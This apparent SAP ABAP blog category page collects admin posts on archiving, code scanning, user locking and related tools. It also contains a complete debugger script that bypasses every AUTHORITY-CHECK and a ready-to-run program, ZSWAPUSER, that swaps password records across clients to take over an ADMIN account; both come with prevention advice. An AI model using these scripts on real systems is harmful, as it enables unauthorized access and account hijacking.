Category: ABAP

abap

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


 *<SCRIPT:HEADER>
 *<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
 *<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
 *<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
 *<BP_REACHED>X</BP_REACHED>

 *</SCRIPT:HEADER>

 *<SCRIPT:PRESETTINGS>
 *<BP>
 *<FLAGACTIVE>X</FLAGACTIVE>
 *<KIND>1 </KIND>
 *<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
 *</BP>

 *</SCRIPT:PRESETTINGS>

 *<SCRIPT:SCRIPT_CLASS>
 *---------------------------------------------------------------------*
 *       CLASS lcl_debugger_script DEFINITION
 *---------------------------------------------------------------------*
 *
 *---------------------------------------------------------------------*
 CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

   PUBLIC SECTION.
     METHODS: prologue  REDEFINITION,
       init    REDEFINITION,
       script  REDEFINITION,
       end     REDEFINITION.

 ENDCLASS.                    "lcl_debugger_script DEFINITION
 *---------------------------------------------------------------------*
 *       CLASS lcl_debugger_script IMPLEMENTATION
 *---------------------------------------------------------------------*
 *
 *---------------------------------------------------------------------*
 CLASS lcl_debugger_script IMPLEMENTATION.
   METHOD prologue.
 *** generate abap_source (source handler for ABAP)
     super->prologue( ).
   ENDMETHOD.                    "prolog

   METHOD init.
 *** insert your initialization code here
   ENDMETHOD.                    "init
   METHOD script.

 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
 *Importing
 *        REFERENCE( P_NEW_VALUE ) TYPE STRING
 *        REFERENCE( P_OFFSET ) TYPE I
 *        REFERENCE( P_LENGTH ) TYPE I
 *        REFERENCE( P_VARNAME ) TYPE STRING
 ****************************************************************

 *************************************************
 * debugger commands (p_command):
 * Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
 * Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
 * Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
 * Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
 *************************************************
 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
 *Importing
 *        REFERENCE( P_COMMAND ) TYPE I
 ****************************************************************

 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
 *Returning
 *        VALUE( P_LINE ) TYPE I
 ****************************************************************

     TRY.
         CALL METHOD abap_source->line
           RECEIVING
             p_line = DATA(p_line).
       CATCH cx_tpda_src_info .
       CATCH cx_tpda_src_descr_invalidated .
     ENDTRY.

     TRY.
         CALL METHOD debugger_controller->debug_step
           EXPORTING
             p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
       CATCH cx_tpda_scr_rtctrl_status .
       CATCH cx_tpda_scr_rtctrl .
     ENDTRY.


 ****************************************************************
 *Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
 *Importing
 *        REFERENCE( P_NEW_VALUE ) TYPE STRING
 *        REFERENCE( P_OFFSET ) TYPE I
 *        REFERENCE( P_LENGTH ) TYPE I
 *        REFERENCE( P_VARNAME ) TYPE STRING
 ****************************************************************

     TRY.
         CALL METHOD cl_tpda_script_data_descr=>change_value
           EXPORTING
             p_new_value = '0'
 *           p_offset    = -1
 *           p_length    = -1
             p_varname   = 'sy-subrc'.
       CATCH cx_tpda_varname .
       CATCH cx_tpda_scr_auth .
     ENDTRY.

   ENDMETHOD.                    "script
   METHOD end.
 *** insert your code which shall be executed at the end of the scripting (before trace is saved)
 *** here

   ENDMETHOD.                    "end
 ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
 *</SCRIPT:SCRIPT_CLASS>

 *</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.

ANST for webapplications and FIORI

In the blog on ANST we focused on searching notes for ABAP GUI applications. This blog will focus on web application that run ABAP code in the backend (such as FIORI, BSP, webdynpro for ABAP).

Questions that will be answered in this blog are:

  • How do I use ANST for web applications?
  • What do I need to do to prepare my system for this?
  • What do I need to do for using ANST for FIORI back end recording?

System preparation for ANST for web applications

First you need to follow the instructions in OSS note 2286869 – ANST: Trace On/Off error “Dynamic Start and Stop cancelled by user” to get rid of the trace error. Unfortunately this note is not really clear. The short instruction on what to do follows now. Go to transaction FILE and search for the ANST_TRACES_GLOBAL. It should look like this:

ANST delete assignment of paths

Then select the logical file definition and delete the line for Physical path. Should look like this:

Now we are good to go for the web part recording, but not yet for FIORI.

ANST for FIORI

To use ANST for FIORI you first need to install OSS note
2605555 – ANST: Enahcement to support Fiori applications. Please follow also the manual steps in the note very carefully.

Tip: this note contains a very good PDF attachment as manual for ANST.

Run ANST for web application

Running ANST for web applications is not very much different from running on SAP GUI. Upon start of the ANST tool select your web application (which is bit different per application):

ANST FIORI

After you now start with Execute you get a popup screen to confirm recording start:

ASNT FIORI start

After pressing start your web browser will start and you can perform the actions you want to trace. To stop go back to the ABAP screen and press the Stop Recording button:

ANST FIORI stop

The rest of the ANST processing is the same as usual.

Reference OSS notes

Reference and bug fix notes:


SAP database growth control: data archiving business discussions

This blog addresses the main challenge in SAP data archiving for functional object: the discussions with the business.

This blog will give answers to the following questions:

  • When to start data archiving discussion with the business?
  • How to come to good retention periods?
  • What are arguments for not archiving certain data?

Data archiving discussion with the business

Unlike technical data deletion, functional data archiving cannot be done without proper business discussion and approval.

Depending on your business several aspects for data are important:

  • Auditing and Sox needs
  • Tax and legal retention periods
  • Product data requirement
  • And so on…..

Here are some rules of thumb you can use before considering to start up the business discussions about archiving:

Rule of thumb 1: the system is pretty new. At least wait 3 years to get an insight into which tables are growing fast and are worth to investigate for data archiving.
Rule of thumb 2: if your system is growing slowly, but the infrastructure capabilities grow faster: only perform technical clean up and don't even start functional data archiving.
Rule of thumb 3: if you are on HANA: check if the data aging concept for functional objects is stable enough and without bugs. Data aging does not require much work, it is only technical and it does not require much business discussions. Data retrieval from end user perspective is transparent.

Data analysis before starting the discussion

If your system is growing fast and/or you are getting performance complaints, then you need to do proper data analysis before starting any business discussion.

Start with proper analysis on the data. Use the TAANA tool to get insights into the data: how is the distribution of data per document type, per year, per plant/company code etc. If you want to propose retention period of let’s say 5 years, you can use the TAANA results to show what percentage of data you can move out of the database.

Secondly: if you have an idea on which data you want to archive, first execute a trial run on a recent production copy. There might be functional blocks that prevent you from archiving data (like not closed documents).

Third important factor is the ease of data retrieval. Some object have a nice simple data retrieval function, and some are really terrible. If the retrieval is good, the business will more easily accept a shorter retention period. Read more on technical data retrieval in this blog.

As last step you can start the business case: how much data will be saved (and how much money hence will be save) and how much performance would be gain. And how much time is needed to be invested for setting up, checking (testing!) and running the data archiving runs.

In practice data archiving business case is only present in very large systems of 5 TB and larger. This sizing tipping point changes in time as hardware gets cheaper and hourly manpower costs go up.

The discussion itself

Take must time in planning for the discussion itself. It is not uncommon that archiving discussions take over a year to complete. The better you are prepared the easier the discussion. It also helps to have a few real performance pain points to get solved via data archiving. There is normally a business owner for this pain point who can help push data archiving.

ABAP where used index

A nice feature in ABAP is the where used function on usage of programs, tables fields etc, in both standard can custom code. For this function to work properly the ABAP where used index must be up-to-date.

This blog will give answers to the following questions:

  • How to re-run the ABAP where used index?
  • How to speed up the ABAP where used index by running in parallel mode?
  • Which bug fix notes should I apply to get a good ABAP where used index?

How to run ABAP where used index?

You can run the programs SAPRSEUB and SAPRSEUC yourself in background, or start program SAPRSEUJ to schedule the jobs for you.

Program SAPRSEUB will index standard SAP objects. Program SAPRSEUC will index custom objects.

More background can be found in OSS note 18023 – Jobs EU_INIT, EU_REORG, EU_PUT. And OSS note 28022 – Customer system: Where-used list for SAP Objects.

S/4 HANA readiness check

For the S/4HANA readiness check (see note 2290622 – SAP Readiness Check for SAP S/4HANA) it is mandatory to run job SAPRSEUC. For more background information on the S/4 HANA readiness check see this blog.

Stopping the job

If for whatever reason you want to stop the jobs, use program SAPRSEUB_STOP.

Performance of the where used jobs using parallel processing

Check if OSS note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance is applied. Using settings in table RSEUPACTRL you can control the runtime behavior of the parallel execution of the where used indexing process. You can check in SM50 and SM66 if the job is using the parallel

OSS notes with bug fixes

The following bug fix OSS notes can be check if they are valid for your release:

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending validity date of user: security and licenses.

Questions that will be answered in this blog are:

  • How can I mass lock users automatically if they have not logged on for a certain time?
  • How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

Password max idle initial

If the user (including yourself) did not logon to the system after this amount of days the password is still valid, but it does not allow you to logon.

If the user tries to logon after the period he will see this error message and cannot continue:

Password deactivated

In SU01 such a user looks like this:

Password expired

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords is one of the nice ways of entering a system as hacker. Especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate long random once off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users locked and unlocked by some method can be security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

RSUSR_LOCK_USERS screen 1

On the first block set the dates for last logon and password change to get a good selection of users.

RSUSR_LOCK_USERS screen 2

On the second block very important to only select Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

OSS notes

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS):

Initial ABAP webdynpro activation

This blog will explain the initial activation in SICF needed to make ABAP for webdynpro work in your system.

Questions that will be answered are:

  • What is the short minimum list of services that must be activated?
  • Where can I find the full list of services?

Short list

SICF mandatory services per system:

  • /default_host/sap/bc/webdynpro
  • /default_host/sap/public/bc/ur
  • /default_host/sap/public/bc/icons
  • /default_host/sap/public/bc/icons_rtl
  • /default_host/sap/public/bc/webicons
  • /default_host/sap/public/bc/pictograms
  • /default_host/sap/public/bc/webdynpro/* (ssr, mimes, and so on)
  • /default_host/sap/public/icman

For custom webdynpro for ABAP developments also activate the following services on the development system:

  • /default_host/sap/public/bc/webdynpro/viewdesigner
  • /default_host/sap/bc/wdvd/

Full list

The actual list of SICF services is described in OSS note 1088717 – Active services for Web Dynpro ABAP in transaction SICF. This also contains the services in case of more complex situations for floor plan management, testing and load distribution.

Scanning ABAP code: ABAP search tool

This blog will explain how to scan ABAP coding in search of a specific keyword or string. Many times older or badly written programs contain hard code logic like system ID’s, plant codes, movement types, order types etc. When a larger business change happens you need to find these codes in your ABAP code and act on them. This blog will explain how to do this search.

Questions that will be answered are:

  • How does the scan program work?
  • How to search for certain strings?
  • How to search for words in the comments?

ABAP search tool

You can start the ABAP search tool with transaction code CODE_SCANNER:

Search start screen

For testing 2 simple programs are written:

REPORT zscantest1.

IF syst-sysid EQ 'S4H'.
  WRITE'development system'.
ELSEIF syst-sysid EQ 'S4P'.
  WRITE'production system'.
ENDIF.
REPORT zscantest2.

DATA zt001w TYPE t001w.

SELECT SINGLE werks FROM t001w INTO zt001w.

IF zt001w-werks EQ 'DE01'.
  WRITE'German plant'.
ELSEIF zt001w-werks  EQ 'US01'.
* USA plant
  WRITE'US plant'.
ELSE.
  WRITE'diffferent plant'.
ENDIF.

If we now start a search with the word ‘S4H’ we get this result:

Result search 1

A hard coded SID.

If we search with ‘US01’ we get this result:

Result search 2

A hard coded plant.

If we search with ‘USA’ we get this result:

Result search 3

The word we were looking for is in the comment lines.

Search alternative program RS_ABAP_SOURCE_SCAN

In SAP note 2764076 – CODE_SCANNER not working properly, SAP explains that CODE_SCANNER might not always work for every release. They offer alternative program RS_ABAP_SOURCE_SCAN (there is no transaction code for this program, so start via SE38):

RS_ABAP_SOURCE_SCAN

Bug fix notes:

ABAP code metric tool

There are many static code analysis tools. Long list can be found on Wikipedia. At some point in time a manager or developer might come to you with one of these tools like “hey, at my previous customer we used SonarABAP for code measurements”.

This blog will explain the ABAP code metric tool built into netweaver. Together with the ATC tool the code metric tool covers most of the functions that such tools deliver.

Questions that will be answered in this blog are:

  • How can I count the amount of lines of Z code in my SAP system?
  • How to run ABAP code metric tool?
  • What output will the ABAP code metric tool deliver?
  • Use cases of the ABAP code metric tool?

Test program

The test the code metric tool write a small ABAP program like this:

ZNESTEDIF test program

This program has nested IF statements (3 levels deep), one ELSE statement and a nested DO.

Code metric tool

Start the custom code analysis tools with transaction /SDF/CD_CCA:

/SDF/CD_CCA

The code metric tool is the tool on the bottom of the screen.

On the start screen select the package and extra checks (selecting more packages and checks will increase the runtime of the tool):

Code metric tool start screen

Result for our test program:

Code metric tool output

The output is giving:

  • LoC: lines of code
  • NoS: number of statements
  • NoC: number of comments
  • COM: complexity of conditions
  • TOTAL DD: complexity weighted by decision depth
  • etc
  • IF: 3 (this was in our test program)
  • ELSEIF: 1
  • DO: 2
  • etc like amount of loops, selects, updates, deletes, modifies, case statements.

Use cases of Code Metric Tool

Use case 1: complex programs

Complex programs are normally source of most productive issues. You can use the code tool to check if the program is not too overly complex (like many nested if and case statements).

Use case 2: the procedural versus OO discussion

Sometimes you have managers wanting you to count the amount of Z objects. If you have switched from procedural coding to OO coding you will find the amount of objects to have increased. The code metric tool can help you here by counting the amount of statements and complexity. The amount of objects in OO is typically higher, but due to re-use and better setup, the total amount of statements and the total complexity decision depth should be smaller.

Use case 3: count the amount of Z code lines in your SAP system

Every now and then there is discussion on Z code. Sometimes the question will popup: “How many lines of Z code do we have in our SAP system?”. This question you can answer as well with the code metric tool explained above.

For reference: SAP standard has 238 million lines of code (source is this SAP blog).

ABAP clone finder

This blog will explain the use of SAP clone finder.

Questions that will be answered in the blog are:

  • What are clones?
  • How to run the clone finder tool?
  • How to analyze the difference between the original and the clone?

What are clones?

Standard SAP offers lot of out-of-the-box functions and reports. But in many cases the standard report only offers 95%. What to do? In many cases developers copy the standard SAP program to Z copy and add the needed 5%. When upgrading the system to higher version or when applying support packages or OSS notes, the Z clone will not be upgraded to latest version. Maybe the clone needs updates as well, or can be deleted now after upgrade (if SAP added the missing 5%).

The clone finder tool is able to find the clones made in the past.

When you are doing a S4HANA conversion project (see blog) you will have to look again at these clones if they are still relevant or not.

Running the clone finder tool

The clone finder is part of the Custom Code Analysis workbench. Start the workbench with transaction /SDF/CD_CCA or transaction CCAPPS:

/SDF/CD_CCA

Clone finder is on top of the list.

Start screen of clone finder:

Clone finder start screen

Pending on the size of your system you can run online or in batch.

Test result of standard SAP copy made as example:

Clone finder results

As example program RSUSR003 and its includes were copied to Z programs. 3 are shown as identical copies. 1 is altered.

In the function link column you can hit the Version Compare button to see the differences:

Version comparison

Differences: the name of program and includes are different. And the authorization check was removed.

Relevant OSS notes

Useful OSS notes: